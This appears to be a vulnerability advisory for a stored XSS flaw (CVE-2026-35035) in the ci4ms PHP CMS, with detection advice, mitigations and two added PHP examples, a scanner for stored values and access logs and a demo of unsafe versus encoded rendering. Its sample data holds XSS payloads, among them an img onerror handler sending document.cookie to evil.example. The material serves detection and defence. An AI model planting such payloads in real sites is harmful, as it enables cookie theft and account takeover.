Platform
php
Component
ci4-cms-erp/ci4ms
Fixed in
0.31.3
0.31.2.0
CVE-2026-35035 is a critical stored cross-site scripting (XSS) vulnerability in ci4-cms-erp/ci4ms up to and including version 0.31.1.0, catalogued as a stored, DOM-based, blind XSS. Text saved in the System Settings > Company Information section is rendered on the public-facing landing pages without proper sanitisation, so an attacker who can write to that section can store a script that runs in the browser of every visitor, including logged-in staff, which is what makes account takeover and privilege escalation possible. The fix shipped in version 0.31.2.0; upgrade as soon as possible.
The impact is severe because a single stored payload executes for everyone who loads an affected landing page. The injection point is the Company Information setting; the execution point is the public landing page that renders it. A script running there can steal session tokens or credentials, alter data, perform actions on behalf of whoever is logged in, and, if an administrator views the page, hand the attacker control of the whole application. The XSS is blind in the sense that the attacker does not see the payload fire: it runs in other people's browsers, often with no visible effect to them either, so the compromise can persist unnoticed for a long time. The result can be data breaches, financial loss and reputational damage.
CVE-2026-35035 was publicly disclosed on 2026-04-06. The CVSS score of 9.1 (CRITICAL) rates severity, not the likelihood of exploitation; the EPSS estimate for this CVE is low (0.10%, 26th percentile). No public proof-of-concept (PoC) code had been released at the time of writing, but a stored XSS payload needs no special tooling to craft, so one may well appear. The vulnerability is not listed in the CISA KEV catalog.
Organisations running ci4-cms-erp/ci4ms in production are at risk whenever the affected landing pages are reachable by the public, since the unsafe rendering lives in the application itself and is not something operators can configure away. Multi-tenant or shared hosting set-ups, where several users share one ci4-cms-erp/ci4ms instance, are particularly exposed: a single account able to edit the Company Information section can plant a payload that affects every tenant and administrator of that instance.
• php: Check what is actually stored in the System Settings Company Information section rather than relying on application logs alone: export or query the settings records and search them for XSS indicators (<script, on...= event handlers, javascript: URIs, and their URL- or entity-encoded forms). As a first pass over a database dump on disk (the path is a placeholder):
grep -r '<script' /path/to/database/files
• generic web: Standard access logs rarely record POST bodies, so log review mostly tells you who wrote to the settings endpoint and when; correlate those writes with the stored values. To confirm whether an instance is vulnerable, submit a harmless marker payload through the settings form on a staging copy (the path and field name below are placeholders, the real ones come from the form; the request needs a session that is allowed to edit system settings, passed with -b) and check whether the landing page echoes it back unencoded:
curl -X POST -d "Company Information=<script>alert('XSS')</script>" https://your-ci4ms-instance/system-settings/company-information
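The checks above as a runnable script, added here as an example and not part of ci4ms or the original page: it peels URL and HTML-entity encoding off each stored Company Information value before matching, so payloads that a plain grep for <script would miss still surface, and it lists every write to the settings endpoint found in an access log plus any query string carrying a payload. The settings path, the row layout and the log lines are constructed for the example and must be adapted to your own instance.

```php
<?php
declare(strict_types=1);

// Added example, not ci4ms code. Scans (1) exported Company Information settings
// values and (2) web-server access-log lines for stored-XSS indicators.
// Sample data below is constructed; the settings path, column names and log
// format are assumptions that you must adapt to your own instance.

const SETTINGS_PATH = '/system-settings/company-information'; // assumed endpoint

const XSS_PATTERNS = [
    'script_tag'    => '/<\s*script\b/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',                     // onerror=, onload=, ...
    'js_uri'        => '/\b(?:javascript|vbscript|data)\s*:/i', // href="javascript:..."
    'active_tag'    => '/<\s*(?:img|svg|iframe|object|embed|math)\b/i',
];

// Attackers often URL- or entity-encode a payload once or twice so that a
// naive filter or grep misses it; peel a few layers before matching.
function decodeLayers(string $value, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = html_entity_decode(rawurldecode($value), ENT_QUOTES | ENT_HTML5, 'UTF-8');
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return $value;
}

/** @return string[] names of the patterns that matched, empty if the value looks clean */
function xssIndicators(string $value): array
{
    $candidate = decodeLayers($value);
    $hits = [];
    foreach (XSS_PATTERNS as $name => $pattern) {
        if (preg_match($pattern, $candidate) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** @param array<int, array{key:string,value:string}> $rows  @return array<string, string[]> */
function scanSettingsRows(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        $hits = xssIndicators($row['value']);
        if ($hits !== []) {
            $findings[$row['key']] = $hits;
        }
    }
    return $findings;
}

// Access logs normally hold only the request line, so this spots payloads in the
// query string and lists every write to the settings endpoint for follow-up.
function scanAccessLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match('/"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        if (strpos($m['target'], SETTINGS_PATH) !== 0) {
            continue;
        }
        $hits = xssIndicators($m['target']);
        if ($m['method'] === 'POST' || $hits !== []) {
            $findings[] = ['method' => $m['method'], 'target' => $m['target'], 'hits' => $hits];
        }
    }
    return $findings;
}

// Constructed sample data: two clean values, one plain payload, one entity/URL-encoded payload.
$rows = [
    ['key' => 'company_name',    'value' => 'Acme GmbH'],
    ['key' => 'company_address', 'value' => '12 Rue de Lyon, 75012 Paris'],
    ['key' => 'company_slogan',  'value' => 'Quality first<script src=//evil.example/x.js></script>'],
    ['key' => 'company_phone',   'value' => '&lt;img src=x onerror=fetch(&#39;//evil.example/&#39;%2Bdocument.cookie)&gt;'],
];
$logLines = [
    '203.0.113.5 - admin [06/Apr/2026:10:15:02 +0000] "POST /system-settings/company-information HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - admin [06/Apr/2026:10:16:40 +0000] "GET /system-settings/company-information?slogan=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Apr/2026:10:17:01 +0000] "GET / HTTP/1.1" 200 8810 "-" "Mozilla/5.0"',
];

print_r(scanSettingsRows($rows));   // company_slogan => [script_tag]; company_phone => [event_handler, active_tag]
print_r(scanAccessLog($logLines));  // the POST (no hits) and the GET whose decoded query contains <script>
```

Run it with php on a CLI after pointing $rows at a real export of the settings table and $logLines at the relevant log file. The indicator list is deliberately broad, so expect a few false positives on legitimate text (a slogan containing "data:" for instance); treat hits as candidates for manual review, not as proof of compromise.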
Exploit status
EPSS
0.10% (percentile 26%)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-35035 is to upgrade to version 0.31.2.0 or later, which contains the fix. If an immediate upgrade is not possible, reduce exposure in the meantime: restrict the accounts allowed to edit System Settings to trusted administrators, review the values currently stored in the Company Information section and remove anything that is not plain company data, and, if you maintain the code yourself, HTML-encode those values where the landing page renders them (output encoding in the view is what actually closes a stored XSS; input validation on its own is a stop-gap that a differently shaped payload can bypass). A Web Application Firewall tuned to block XSS payloads and a Content Security Policy that forbids inline scripts and off-site script sources add defence in depth, but neither replaces the patch. After upgrading, re-check the stored values once more, since a payload that was saved before the fix should not be assumed to have been cleaned up by it. Keep security policies and procedures current so that XSS is covered by regular review.
Update to version 0.31.2 or later to fix the vulnerability. That version implements proper sanitisation of user input in the system settings, preventing the unsafe storage and rendering of that data on public pages.
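To make the mitigation advice concrete, here is an added example (not ci4ms code, not from the original page) contrasting the three pieces: a naive "block <script>" input filter of the kind a quick workaround might add, the vulnerable pattern of echoing a stored value straight into HTML, and the fixed pattern of encoding at the output point, with a CSP header as the extra layer. The company data and the footer markup are constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not ci4ms code. Data and markup are constructed; the real view
// and variable names in the application are assumptions.
$company = [
    'name'   => 'Acme GmbH',
    // A payload with no <script> tag at all: an image that fails to load and runs its handler.
    'slogan' => 'Quality first<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">',
];

// Naive input-validation workaround: reject values containing a <script> tag on save.
// Returns true ("accept") for the payload above, which is why a blacklist alone is not a fix.
function naiveInputFilter(string $value): bool
{
    return stripos($value, '<script') === false;
}

// Vulnerable pattern: the stored value is interpolated into the page unchanged,
// so the browser parses the <img ... onerror=...> and executes the handler.
function renderFooterUnsafe(array $company): string
{
    return "<footer><strong>{$company['name']}</strong> - {$company['slogan']}</footer>";
}

// Fixed pattern: HTML-encode at the point of output, for the HTML-body context.
// In a CodeIgniter 4 view the equivalent is the esc() helper around the variable;
// for attribute, JavaScript or URL contexts esc() takes a context argument and the
// encoding rules differ, so pick the one that matches where the value lands.
function renderFooterSafe(array $company): string
{
    $e = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<footer><strong>' . $e($company['name']) . '</strong> - ' . $e($company['slogan']) . '</footer>';
}

// Defence in depth: without 'unsafe-inline' the inline onerror handler is refused,
// and script-src 'self' blocks <script src=//evil.example/...> even if an encoding
// bug slips through somewhere else on the page.
function contentSecurityPolicyHeader(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

var_dump(naiveInputFilter($company['slogan'])); // bool(true): the filter lets the payload through
echo renderFooterUnsafe($company), PHP_EOL;     // the <img ... onerror=...> reaches the browser intact
echo renderFooterSafe($company), PHP_EOL;       // &lt;img src=x onerror=&quot;...&quot;&gt; is shown as text
echo contentSecurityPolicyHeader(), PHP_EOL;
```

The order of preference follows from the output: the encoded render neutralises any payload regardless of shape, the CSP limits the damage if encoding is missed, and the input filter only catches the payloads its author thought of. That is the reason the text above calls input validation a stop-gap rather than a fix.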
CVE-2026-35035 is a critical Stored DOM Blind XSS vulnerability in ci4-cms-erp/ci4ms versions up to 0.31.1.0, allowing attackers to achieve full account takeover.
You are affected if you are using ci4-cms-erp/ci4ms version 0.31.1.0 or earlier and have public-facing landing pages.
Upgrade to version 0.31.2.0 or later. Implement input validation and sanitization as a temporary workaround.
No public exploit is known at the time of writing and the EPSS estimate is low (0.10%), but a stored XSS payload is trivial to craft once an attacker can write to the affected field, so treat the critical CVSS score as a reason to patch promptly rather than as evidence of active exploitation.
Refer to the official ci4-cms-erp project repository or website for the latest security advisories and updates.